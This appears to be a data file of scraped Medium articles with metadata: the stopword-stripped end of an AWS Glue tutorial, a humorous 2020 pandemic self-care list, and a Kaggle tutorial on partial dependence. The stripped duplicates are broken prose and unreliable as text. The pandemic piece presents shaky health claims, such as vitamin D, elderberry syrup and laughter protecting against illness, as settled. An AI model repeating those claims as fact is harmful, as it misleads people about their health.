eacb9a1ffbc686f61387f63 transformationctx findmatches2 datasink3 glueContextwritedynamicframefromoptionsframe findmatches2 connectiontype s3 connectionoptions path s3bucketnamedatamltransformsoutput format csv transformationctx datasink3 jobcommit sc SparkContextglueContext GlueContextscspark glueContextsparksessionjob JobglueContextjobinitargsJOBNAME args type DataSource args database mltransforms tablename customer transformationctx datasource0 return datasource0 input datasource0 glueContextcreatedynamicframefromcatalogdatabase mltransforms tablename customer transformationctx datasource0 type ResolveChoice args choice MATCHCATALOG database mltransforms tablename customer transformationctx resolvechoice1 return resolvechoice1 input frame datasource0resolvechoice1 ResolveChoiceapplyframe datasource0 choice MATCHCATALOG database mltransforms tablename customer transformationctx resolvechoice1 type FindMatches args transformId eacb9a1ffbc686f61387f63 emitFusion false survivorComparisonField transformationctx findmatches2 return findmatches2 input frame resolvechoice1findmatches2 FindMatchesapplyframe resolvechoice1 transformId eacb9a1ffbc686f61387f63 transformationctx findmatches2 type DataSink args connectiontype s3 connectionoptions path s3bucketnamedatamltransformsoutput format csv transformationctx datasink3 return datasink3 input frame findmatches2datasink3 glueContextwritedynamicframefromoptionsframe findmatches2 connectiontype s3 connectionoptions path s3 datamltransformsoutput format csv transformationctx datasink3jobcommit Choose Run job start job run Check status job job list job finish ML transform History tab new Run ID row added type ETL job Navigate Jobs History tab pane job run listed detail run choose Logs Check run status Succeeded finish Step 6 Verify Output Data Amazon S3 Amazon Athena step check output job run Amazon S3 bucket chose added job create table Glue Data catalog pointing output location like way crawled source data Step 1 query data Athena However Find match transform add another column named matchid identify matching record output Rows matchid considered matching record don’t find match continue teach transform adding label Thanks read look forward comment story authored PV Subbareddy Subbareddy Big Data Engineer specializing AWS Big Data Services Apache Spark EcosystemTags Cloud Computing Machine Learning Spark AWS Software Development
3,804
Do These Things To Survive The Rest of The Pandemic
Do These Things To Survive The Rest of The Pandemic Upgrade your mask. Eat healthy. Sleep. Laugh. You could say round one of the pandemic is over. We didn’t do very well. Plus, round two has already started. The good news is that science has a plan for us. I’m not a scientist, but I listen to science. I got an A in AP biology and a B+ in chemistry, which already makes me more qualified than most of our politicians. Smart people have been taking this thing very seriously. We always do our homework. So here’s a list of practical things you can do to actually make it through this winter: Upgrade your mask. The health experts say the point of wearing a mask is to protect other people. Unfortunately, there’s a lot of idiots out there who think it’s a terrible assault on their personal freedom. So you’re going to have to level up your facegear. Everyone in the world is selling masks right now. Kylie Jenner probably has one. Hold on. Let me check. Yep. She’s got one. Take a look: Kylie Jenner’s face mask. (Not recommended.) Wow. That looks safe… Try this instead: Get a nanofiber mask. You need a mask that filters down to .3 microns. These are called N95 filters. Earlier this year they were hard to come by, and you’d probably go to hell for buying them, because that would’ve meant depriving hospitals of PPE. Good news, a lot’s changed since then. A few months ago, startup companies like Filti started making high quality masks and replaceable filters with nanofiber materials. They’re not medical grade, but they’re lab tested. There’s also HALO Mask, which makes the same kinds of products, using nanofiber manufactured in New Zealand. I did my homework. They’re both legit. (And they’re not paying me anything to plug them. They barely know I exist.) This means you can go run errands without freaking out whenever some covidiot crosses your path without a mask. Same goes if you can’t work from home. Your mask actually protects you. How much? A helluva lot more than your standard generic face mask at most stores. I’ll take it. You’re skeptical. That’s cool. Researching masks turned into a summer project. I spent weeks digging through articles and websites. Finally, a reliable newspaper published this piece explaining how mask filtration works. Basically: Yes, the coronavirus is smaller than .3 microns. (.1 micron, to be exact.) But that doesn’t mean anything by itself, for two reasons: Viruses always attach to larger particles. Nobody inhales free-floating virus. They inhale droplets, which are always 1.0 micron or bigger. You’re filtering the droplets with virus attached to them, not the naked virus particles themselves. Masks with .3 micron filtration can capture particles smaller than that because of a phenomenon called “Brownian motion.” That means very small particles move in a jagged zig-zag pattern, which increases the chances they’ll get snagged. So you’ve got a plan for a decent mask. Now what? Start taking Vitamin D You should be taking a multivitamin. On top of that, the experts are starting to learn that if you’re topped off on Vitamin D, you probably have a lesser risk of dying from the coronavirus. Hey, you might as well try. You can take a supplement. You can drink milk and orange juice. You can eat salmon. You can make sure you spend half an hour outside. Yes, every day. No, you can’t just sit by your window and read. I’m lazy. I checked. Glass blocks the specific spectrum of light your body needs. Start eating your veggies. Your immune system likes healthy food. Dark greens: Kale. Spinach. Broccoli. Asparagus. Plus onions and tomatoes. Even my 2-year-old eats kale now. I mix up a bunch of vegetables and kale in a giant batch and pour balsamic and lemon juice all over it. Add some pepper and feta cheese, and some olive oil. I can eat that all day. Start making elderberry syrup. Some studies show it helps reduce the duration and severity of the flu and other viruses. Buying elderberry syrup in a bottle is expensive. So you can make your own. Just buy some elderberries in bulk. You can find all kinds of recipes for syrup online. Stop drinking so much. You’re going to need your liver. Alcohol is bad for it, and basically everything else in your body. New studies have killed that cozy idea that drinking in moderation might improve your health. Basically, the downsides of boozing far outweigh the benefits. Alcohol might lower the risk of heart disease, but it increases the risk of cancer and liver disease. I know. This sucks. We’ve all been using health as an excuse to justify drinking a helluva lot more than usual this year. You’re gonna have to reel it in. You get to drink once a week now, if that. And you get to have one or two drinks maximum. It’s almost, like, not even worth it. Did you know the number one reason people drink is boredom? So I guess you’ll need to find a hobby. Let’s move on to your mental and emotional health. Learn to be okay with a mess. For the first six months, I was all about chores. They relaxed me. Seeing a perfectly clean sink brought me peace. Folding laundry calmed me down. Then something changed. Work got busy again. My toddler developed advanced mess-making skills. Keeping the house clean morphed into a set of expectations I was placing on myself. I sacrificed sleep to keep everything tidy. This had to stop. Upon reflection, I figured out what I was doing. I was stress cleaning. Chores were a way for me to feel like I had control. Learn how to do nothing. The answer to stress cleaning was learning to let go of control, as in literally just stop my brain and do nothing for ten or fifteen minutes. It was easier than I thought. I was ready for a break. I just had to give myself one. Now I’m cured. A handful of dirty dishes in the sink doesn’t stress me out anymore. I can’t afford to let it. Doing nothing is the most relaxing thing in the world right now. It beats just about everything else. Stop trying to relax. Relaxing is overrated now. In the pandemic era, it doesn’t work. I finally realized that everything I was trying to do to “chill out” was just overstimulating or triggering me. After a while, my favorite shows just made me think too much about the future, or too much about the past. So just do nothing. Or… Stop your revenge bedtime procrastination. We already weren’t getting enough sleep before the pandemic. Part of the problem is that we convince ourselves to stay up too late. We do that because we’re trying to steal back a part of our day. The Japanese call this, “Revenge bedtime procrastination.” They have the best names for everything. Sleep is more important than ever. So when you’re tired, do what Samuel L. Jackson says. Just go the f*ck to sleep, man. It’s almost winter. You’re a mammal. Your body wants to hibernate. Let it. That doesn’t mean sleeping the next six months in a cave. But it does mean going to bed when you feel tired, regardless of what time it is. I’ve been going down around 10 pm some nights, about two or three hours early for my taste. But it’s giving me a lot more energy. I wake up at 5 or 6 am, ready to go. Finally become a morning person. If you’re stuck in quarantine with family, then super early mornings are basically the only way you can work in peace now. Back in June, I could work under distraction and disruption. Sometimes I still can. But making that the norm was wearing me out. So if I actually want to be productive, I’ll wake up at 4 am and work for a few hours before the kid arises. It helps. It makes the rest of the day more relaxing. Stop trying to not talk about the news. You know what happens when you try to not talk about the news? You think about it. Then you talk about it anyway. Then you feel guilty. What a vicious cycle. If you want to gleefully speculate about when Trump’s going to have a relapse, then just do it. Get it out of your system. Remember to laugh. Take the world seriously. But not that seriously. We were all freaking out about the first presidential debate. The top Google search the next day was “move to New Zealand.” Then Jim Carey and Alec Baldwin saved us. They reminded us how comically absurd that entire debate was. Don’t forget to laugh. It provides perspective. It also boosts your immune system. So watch comedy. Tell jokes. Be sarcastic. Find happiness where you can. It surprises me how often I’m actually happy when I follow all this advice. It almost feels like the world isn’t falling apart. I feel prepared for worst case scenarios. I’m not scared of the bottom anymore. I know what we’ll be doing for the next six months, and I know what’s going to happen. Now it’s just a matter of getting through it. So upgrade your mask. Take your vitamins. Eat your veggies. Cool it with the alcohol. Go to sleep when you’re tired. Stop stress cleaning your house. Remind yourself how to just do nothing. Stop trying so hard to not be in a pandemic. Just be in it. Don’t forget to laugh.
https://medium.com/the-haven/do-these-things-to-survive-the-rest-of-the-pandemic-f66e0245a9f5
['Jessica Wildfire']
2020-10-09 04:59:22.849000+00:00
['Mindfulness', 'Humor', 'Health', 'Culture', 'Society']
Title Things Survive Rest PandemicContent Things Survive Rest Pandemic Upgrade mask Eat healthy Sleep Laugh could say round one pandemic didn’t well Plus round two already started good news science plan u I’m scientist listen science got AP biology B chemistry already make qualified politician Smart people taking thing seriously always homework here’s list practical thing actually make winter Upgrade mask health expert say point wearing mask protect people Unfortunately there’s lot idiot think it’s terrible assault personal freedom you’re going level facegear Everyone world selling mask right Kylie Jenner probably one Hold Let check Yep She’s got one Take look Kylie Jenner’s face mask recommended Wow look safe… Try instead Get nanofiber mask need mask filter 3 micron called N95 filter Earlier year hard come you’d probably go hell buying would’ve meant depriving hospital PPE Good news lot’s changed since month ago startup company like Filti started making high quality mask replaceable filter nanofiber material They’re medical grade they’re lab tested There’s also HALO Mask make kind product using nanofiber manufactured New Zealand homework They’re legit they’re paying anything plug barely know exist mean go run errand without freaking whenever covidiot cross path without mask go can’t work home mask actually protects much helluva lot standard generic face mask store I’ll take You’re skeptical That’s cool Researching mask turned summer project spent week digging article website Finally reliable newspaper published piece explaining mask filtration work Basically Yes coronavirus smaller 3 micron 1 micron exact doesn’t mean anything two reason Viruses always attach larger particle Nobody inhales freefloating virus inhale droplet always 10 micron bigger You’re filtering droplet virus attached naked virus particle Masks 3 micron filtration capture particle smaller phenomenon called “Brownian motion” mean small particle move jagged zigzag pattern increase chance they’ll get snagged you’ve got plan decent mask Start taking Vitamin taking multivitamin top expert starting learn you’re topped Vitamin probably lesser risk dying coronavirus Hey might well try take supplement drink milk orange juice eat salmon make sure spend half hour outside Yes every day can’t sit window read I’m lazy checked Glass block specific spectrum light body need Start eating veggie immune system like healthy food Dark green Kale Spinach Broccoli Asparagus Plus onion tomato Even 2yearold eats kale mix bunch vegetable kale giant batch pour balsamic lemon juice Add pepper feta cheese olive oil eat day Start making elderberry syrup study show help reduce duration severity flu virus Buying elderberry syrup bottle expensive make buy elderberry bulk find kind recipe syrup online Stop drinking much You’re going need liver Alcohol bad basically everything else body New study killed cozy idea drinking moderation might improve health Basically downside boozing far outweigh benefit Alcohol might lower risk heart disease increase risk cancer liver disease know suck We’ve using health excuse justify drinking helluva lot usual year You’re gonna reel get drink week get one two drink maximum It’s almost like even worth know number one reason people drink boredom guess you’ll need find hobby Let’s move mental emotional health Learn okay mess first six month chore relaxed Seeing perfectly clean sink brought peace Folding laundry calmed something changed Work got busy toddler developed advanced messmaking skill Keeping house clean morphed set expectation placing sacrificed sleep keep everything tidy stop Upon reflection figured stress cleaning Chores way feel like control Learn nothing answer stress cleaning learning let go control literally stop brain nothing ten fifteen minute easier thought ready break give one I’m cured handful dirty dish sink doesn’t stress anymore can’t afford let nothing relaxing thing world right beat everything else Stop trying relax Relaxing overrated pandemic era doesn’t work finally realized everything trying “chill out” overstimulating triggering favorite show made think much future much past nothing Or… Stop revenge bedtime procrastination already weren’t getting enough sleep pandemic Part problem convince stay late we’re trying steal back part day Japanese call “Revenge bedtime procrastination” best name everything Sleep important ever you’re tired Samuel L Jackson say go fck sleep man It’s almost winter You’re mammal body want hibernate Let doesn’t mean sleeping next six month cave mean going bed feel tired regardless time I’ve going around 10 pm night two three hour early taste it’s giving lot energy wake 5 6 ready go Finally become morning person you’re stuck quarantine family super early morning basically way work peace Back June could work distraction disruption Sometimes still making norm wearing actually want productive I’ll wake 4 work hour kid arises help make rest day relaxing Stop trying talk news know happens try talk news think talk anyway feel guilty vicious cycle want gleefully speculate Trump’s going relapse Get system Remember laugh Take world seriously seriously freaking first presidential debate top Google search next day “move New Zealand” Jim Carey Alec Baldwin saved u reminded u comically absurd entire debate Don’t forget laugh provides perspective also boost immune system watch comedy Tell joke sarcastic Find happiness surprise often I’m actually happy follow advice almost feel like world isn’t falling apart feel prepared worst case scenario I’m scared bottom anymore know we’ll next six month know what’s going happen it’s matter getting upgrade mask Take vitamin Eat veggie Cool alcohol Go sleep you’re tired Stop stress cleaning house Remind nothing Stop trying hard pandemic Don’t forget laughTags Mindfulness Humor Health Culture Society
3,805
Tackling Kaggle’s Mercedes-Benz Greener Manufacturing Competition with Python
Photo by Markus Spiske on Unsplash Introduction In this part, we’ll perform exploratory data analysis (EDA) on our data, which is a crucial part of most machine learning problems. Although we might not end up increasing our score, we will draw invaluable insights from our data, which is often one of the primary objectives of real-world machine learning. We are going to use some of the traditional EDA techniques, but we’ll also touch on a few underused ones as well. You can find the notebook for this tutorial here. Without further ado, let’s get coding (in Colab)! Ceteris Paribus From the previous article, we have a vague idea of what partial dependence is, the problem it tries to solve, and how it does so. However, quite a few of the details were left out, so this article will be devoted to filling those empty spots. First, let’s talk about what ‘with all other things being equal’ means. Suppose we have a smaller version of our dataset, which could look something like this: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ And we’d like to know how the dependent variable reacts to different values of ‘X5’. In order to do so, we must modify our dataset so that all variables but ‘X5’ remain the same. How would we do that? Well, it’s as simple as replacing all instances of ‘X5’ with the class we’d like to know the average test time of. So we’d have 3 (number of classes in ‘X5’) different versions of our dataset and in each one, ‘X5’ is a constant: Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | a | 97 | | 1 | 1 | 1 | a | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | a | 96.5 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | b | 102 | | 1 | 0 | 0 | b | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | b | 102.9 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 99 | | 0 | 1 | 0 | c | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | c | 97.5 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ There are now 3 variations of our dataset, where the only difference between them is ‘X5’ (that is, all other things are equal). All that’s left is simply taking the average of the dependent values of each of the datasets above. But there’s obviously a huge problem we face: The dependent values are for the original dataset, not the modified ones. For example, in the first row, ‘y’ = 99 is the test time for ‘X5’ = ‘a’, not ‘b’ or ‘c’. Thus, we need a way to find the dependent value for a row not present in our dataset. Fortunately, we have the tools to do exactly that. A “Partial” Solution In part 2 of this series, we built a slightly tuned Random Forest and guess what it can do? Estimate the test time of a vehicle, which is just what we need. We can simply use our model to predict the dependent values of datasets A, B, and C (the y-values shown here are most likely not consistent and make no sense at all. But that’s besides the point): Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 100 | | 0 | 1 | 0 | a | 98 | | 1 | 1 | 1 | a | 105 | | 1 | 0 | 0 | a | 97 | | 0 | 0 | 0 | a | 95 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 90 | | 0 | 1 | 0 | b | 99 | | 1 | 1 | 1 | b | 105 | | 1 | 0 | 0 | b | 97 | | 0 | 0 | 0 | b | 96 | | 1 | 0 | 1 | b | 102 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 90 | | 0 | 1 | 0 | c | 105 | | 1 | 1 | 1 | c | 100 | | 1 | 0 | 0 | c | 97.1 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.1 | +------+------+------+----+-------+ Now we can take the average of the dependent values to get a reasonably close estimate for the average test time of vehicles with a specific ‘X5’. This method, like any other, has its own disadvantages: For starters, it’s only as good as our model. Therefore, if our model’s not very accurate, the results we get aren’t very reliable and might even be worse than taking the average of the original y-values. Another issue that arises with the use of partial dependence is that not all categories are compatible. For instance, let’s go back to the example of ‘X5’ and how its value can correspond to the level of climate consciousness of the owner. And we’ll also add a made-up column, called ‘X1000’, that includes 26 categories (‘a’, ‘b’, …, ‘z’) , relating to the type of AC used in a car. Now, assume ‘a’ is a type of AC which is cheap but comes at the expense of being inefficient relative to the amount of gas used and therefore damaging to the climate. But on the other end of the alphabet, we have ‘z’, a costly but climate-smart option for customers feeling guilty about themselves and their carbon footprint. In that case, if someone chooses ‘X5’ = ‘ag’ (which, remember, is the fuel-efficient type of tire), they’re most likely not going to choose ‘a’ as their AC because why order a cheeseburger combo with a diet Coke? However, for every data point in our dataset, partial dependence pairs all classes in ‘X5’ with it, even if the new rows are erroneous. This issue can be illustrated as follows: Original: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'aa' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | aa | y | | 1 | 1 | 1 | aa | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'ag' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | ag | a | | 0 | 0 | 0 | ag | b | +------+------+------+----+-------+ Please note that, in the first example, climate-smart ‘X5’ options (‘ag’) go with climate-smart ‘X1000’ options (‘y’ and ‘z’) and carbon-emitting ‘X5’ options (‘aa’) go with carbon-emitting ‘X1000’ options (‘a’ and ‘b’), as is expected from customers with different views on climate-related issues. But in the second and third examples, climate-smart ‘X5’ options go with carbon-emitting ‘X1000’ options and carbon-emitting ‘X5’ options go with climate-smart ‘X1000’ options, which is the opposite of what is expected from (both green and non-green) customers. This could potentially be a problem because: Our model can’t make accurate predictions for rows which aren’t from the same distribution as our training set or Even if our model is nearly perfect when it comes to generalization, some rows might not even make theoretical sense and hence, we shouldn’t include them when doing partial dependence. Such an example would be a car made in the 1800s equipped with a turbocharger, etc. And lastly, perhaps partial dependence’s biggest problem in real-world machine learning is the amount of time it could take. For a dataset with a couple hundred thousand rows and a few hundred features with high cardinalities, performing partial dependence would be infeasible, especially if our model takes long for inference. A typical workaround is using only a small subset of the rows we’re given or doing partial dependence only for the features we really care about (the former shouldn’t change the results drastically as long as our mini-dataset is representative of the actual one). Despite all its imperfections, however, partial dependence is still an extremely powerful tool which enables you to gain insights into your dataset which traditional EDA methods simply can’t and these insights could then be turned into better business decisions which could maximize profit and impact. There are numerous such examples, and here we’ll go through one together. Bulldozer Auction A while ago, I wrote a series about a Kaggle competition where the goal was to successfully predict the auction price of a bulldozer given various features such as its size, the ID of the auctioneer, and a lot more, with most being technical terms not everyone (including me) understands. In one of the later articles, we realized the column containing the year the bulldozers were made (‘YearMade’) is very important to our model’s performance, which is probably no surprise to bulldozer professionals. However, we didn’t know how ‘YearMade’ affects the sale prices of the heavy equipment: Do they increase monotonically? Maybe plotting ‘YearMade’ against the dependent variable be all over the place? Or perhaps as ‘YearMade’ increases the sale price decreases? Logically, the first scenario should be the case but we need a way to prove that. You can probably see where this is going… The first thing that jumps to mind is taking the average of all sale prices for all years and seeing what that gives us. If our hypothesis is indeed true, we should get an increasing line/curve, right? But it turns out if we do that, there’d be a dip around ‘YearMade’ = 2000, which would mean bulldozers made in the early 1990s sell for more than the ones made in the late 1990s, contrary to our speculation. Picture from the ‘Introduction to Machine Learning for Coders’ course The organizers of the auctions might then decide since bulldozers made in the late 1990s sell for less than the ones made in the early 1990s, the former isn’t worth their time so they’ll stop auctioning it. By now, you should be suspicious of conclusions drawn by taking averages and resort to using partial dependence instead. If you do so for this bulldozer dataset, the result will be very different from the above graph and confirm our initial hypothesis. Picture from the ‘Introduction to Machine Learning for Coders’ course Please note that the yellowish line is what we should be looking at (just ignore the blue ones for now) and the y-axis is the log of the dependent variable. As we can see, ‘YearMade’ and the y-axis have an almost linear relationship which means in reality, sale prices grow exponentially with respect to the year our bulldozers were made. There are a few possible explanations for the inconstistency between the two plots: Recession, difference between the quality of the bulldozers made during various time intervals, etc. Whichever the case, however, we can be certain if two bulldozers are identical in all ways but the year they were made, the older one will have a lower sale price. But if the auction organizers make their decisions based on the initial plot, they wouldn’t know that and would lose big sums of money by not auctioning heavy equipment made in certain years. Conclusion In this part, we saw how partial dependence works behind the scenes and frankly, it’s not very complicated: In order to calculate the true average of the dependent value for a category c (or a continuous value) in a feature F, it sets F to c for all rows in our dataset (or a subset of it, if it’s too big) and uses a predictive model to figure the dependent values for these modified rows. It then takes the averages of the predictions made by our model and that’s basically what we’re looking for (there are a few other steps involved but that’s the general idea). Admittedly, partial dependence does come with its own particular challenges, the major ones being the issue of some categories not being compatible with each other (a car made in the 1800s with autopilot) and the fact that it can be time- and resource- consuming sometimes. Nevertheless, it’s still a great tool to have in your toolbox and can aid you in making business decisions and drawing meaningful insights from your dataset. In the next part, we’ll look at how to implement partial dependence in Python using a powerful library called PDPBox, which comes with beautiful visualizations and several other useful related tools. To be continued… Please, if you have any questions or feedback at all, feel welcome to post them in the comments below and as always, thank you for reading! Part 1: https://medium.com/python-in-plain-english/mercedes-benz-greener-manufacturing-part-1-basic-data-pre-processing-a32d17803064 Part 2: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-3ddff72d0187 Part 3: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-1ca6b030bf58 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-b5220f479a44 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-a004659e02c4 Part 4: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-82dd27e53757 Part 5: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-e31198ecafae Part 5 (final part): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-ecbd2714d952 Twitter: https://twitter.com/bobmcdear GitHub: https://github.com/bobmcdear
https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-7b203e886f8d
['Borna Ahmadzadeh']
2020-12-27 18:10:47.421000+00:00
['Machine Learning', 'Artificial Intelligence', 'AI', 'Data Science', 'Data Visualization']
Title Tackling Kaggle’s MercedesBenz Greener Manufacturing Competition PythonContent Photo Markus Spiske Unsplash Introduction part we’ll perform exploratory data analysis EDA data crucial part machine learning problem Although might end increasing score draw invaluable insight data often one primary objective realworld machine learning going use traditional EDA technique we’ll also touch underused one well find notebook tutorial Without ado let’s get coding Colab Ceteris Paribus previous article vague idea partial dependence problem try solve However quite detail left article devoted filling empty spot First let’s talk ‘with thing equal’ mean Suppose smaller version dataset could look something like X314 X119 X127 X5 0 0 1 99 0 1 0 b 97 1 1 1 c 102 1 0 0 975 0 0 0 b 965 1 0 1 c 1029 we’d like know dependent variable reacts different value ‘X5’ order must modify dataset variable ‘X5’ remain would Well it’s simple replacing instance ‘X5’ class we’d like know average test time we’d 3 number class ‘X5’ different version dataset one ‘X5’ constant Dataset X314 X119 X127 X5 0 0 1 99 0 1 0 97 1 1 1 102 1 0 0 975 0 0 0 965 1 0 1 1029 Dataset B X314 X119 X127 X5 0 0 1 b 99 0 1 0 b 97 1 1 1 b 102 1 0 0 b 975 0 0 0 b 965 1 0 1 b 1029 Dataset C X314 X119 X127 X5 0 0 1 c 99 0 1 0 c 97 1 1 1 c 102 1 0 0 c 975 0 0 0 c 965 1 0 1 c 1029 3 variation dataset difference ‘X5’ thing equal that’s left simply taking average dependent value datasets there’s obviously huge problem face dependent value original dataset modified one example first row ‘y’ 99 test time ‘X5’ ‘a’ ‘b’ ‘c’ Thus need way find dependent value row present dataset Fortunately tool exactly “Partial” Solution part 2 series built slightly tuned Random Forest guess Estimate test time vehicle need simply use model predict dependent value datasets B C yvalues shown likely consistent make sense that’s besides point Dataset X314 X119 X127 X5 0 0 1 100 0 1 0 98 1 1 1 105 1 0 0 97 0 0 0 95 1 0 1 1029 Dataset B X314 X119 X127 X5 0 0 1 b 90 0 1 0 b 99 1 1 1 b 105 1 0 0 b 97 0 0 0 b 96 1 0 1 b 102 Dataset C X314 X119 X127 X5 0 0 1 c 90 0 1 0 c 105 1 1 1 c 100 1 0 0 c 971 0 0 0 c 965 1 0 1 c 1021 take average dependent value get reasonably close estimate average test time vehicle specific ‘X5’ method like disadvantage starter it’s good model Therefore model’s accurate result get aren’t reliable might even worse taking average original yvalues Another issue arises use partial dependence category compatible instance let’s go back example ‘X5’ value correspond level climate consciousness owner we’ll also add madeup column called ‘X1000’ includes 26 category ‘a’ ‘b’ … ‘z’ relating type AC used car assume ‘a’ type AC cheap come expense inefficient relative amount gas used therefore damaging climate end alphabet ‘z’ costly climatesmart option customer feeling guilty carbon footprint case someone chooses ‘X5’ ‘ag’ remember fuelefficient type tire they’re likely going choose ‘a’ AC order cheeseburger combo diet Coke However every data point dataset partial dependence pair class ‘X5’ even new row erroneous issue illustrated follows Original X314 X119 X127 X5 X1000 0 0 1 ag 1 1 1 ag z 1 0 0 aa 0 0 0 aa b Partial dependence X5 aa X314 X119 X127 X5 X1000 0 0 1 aa 1 1 1 aa z 1 0 0 aa 0 0 0 aa b Partial dependence X5 ag X314 X119 X127 X5 X1000 0 0 1 ag 1 1 1 ag z 1 0 0 ag 0 0 0 ag b Please note first example climatesmart ‘X5’ option ‘ag’ go climatesmart ‘X1000’ option ‘y’ ‘z’ carbonemitting ‘X5’ option ‘aa’ go carbonemitting ‘X1000’ option ‘a’ ‘b’ expected customer different view climaterelated issue second third example climatesmart ‘X5’ option go carbonemitting ‘X1000’ option carbonemitting ‘X5’ option go climatesmart ‘X1000’ option opposite expected green nongreen customer could potentially problem model can’t make accurate prediction row aren’t distribution training set Even model nearly perfect come generalization row might even make theoretical sense hence shouldn’t include partial dependence example would car made 1800s equipped turbocharger etc lastly perhaps partial dependence’s biggest problem realworld machine learning amount time could take dataset couple hundred thousand row hundred feature high cardinality performing partial dependence would infeasible especially model take long inference typical workaround using small subset row we’re given partial dependence feature really care former shouldn’t change result drastically long minidataset representative actual one Despite imperfection however partial dependence still extremely powerful tool enables gain insight dataset traditional EDA method simply can’t insight could turned better business decision could maximize profit impact numerous example we’ll go one together Bulldozer Auction ago wrote series Kaggle competition goal successfully predict auction price bulldozer given various feature size ID auctioneer lot technical term everyone including understands one later article realized column containing year bulldozer made ‘YearMade’ important model’s performance probably surprise bulldozer professional However didn’t know ‘YearMade’ affect sale price heavy equipment increase monotonically Maybe plotting ‘YearMade’ dependent variable place perhaps ‘YearMade’ increase sale price decrease Logically first scenario case need way prove probably see going… first thing jump mind taking average sale price year seeing give u hypothesis indeed true get increasing linecurve right turn there’d dip around ‘YearMade’ 2000 would mean bulldozer made early 1990s sell one made late 1990s contrary speculation Picture ‘Introduction Machine Learning Coders’ course organizer auction might decide since bulldozer made late 1990s sell le one made early 1990s former isn’t worth time they’ll stop auctioning suspicious conclusion drawn taking average resort using partial dependence instead bulldozer dataset result different graph confirm initial hypothesis Picture ‘Introduction Machine Learning Coders’ course Please note yellowish line looking ignore blue one yaxis log dependent variable see ‘YearMade’ yaxis almost linear relationship mean reality sale price grow exponentially respect year bulldozer made possible explanation inconstistency two plot Recession difference quality bulldozer made various time interval etc Whichever case however certain two bulldozer identical way year made older one lower sale price auction organizer make decision based initial plot wouldn’t know would lose big sum money auctioning heavy equipment made certain year Conclusion part saw partial dependence work behind scene frankly it’s complicated order calculate true average dependent value category c continuous value feature F set F c row dataset subset it’s big us predictive model figure dependent value modified row take average prediction made model that’s basically we’re looking step involved that’s general idea Admittedly partial dependence come particular challenge major one issue category compatible car made 1800s autopilot fact time resource consuming sometimes Nevertheless it’s still great tool toolbox aid making business decision drawing meaningful insight dataset next part we’ll look implement partial dependence Python using powerful library called PDPBox come beautiful visualization several useful related tool continued… Please question feedback feel welcome post comment always thank reading Part 1 httpsmediumcompythoninplainenglishmercedesbenzgreenermanufacturingpart1basicdatapreprocessinga32d17803064 Part 2 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpython3ddff72d0187 Part 3 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpython1ca6b030bf58 Part 3 continued httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythonb5220f479a44 Part 3 continued httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythona004659e02c4 Part 4 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpython82dd27e53757 Part 5 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythone31198ecafae Part 5 final part 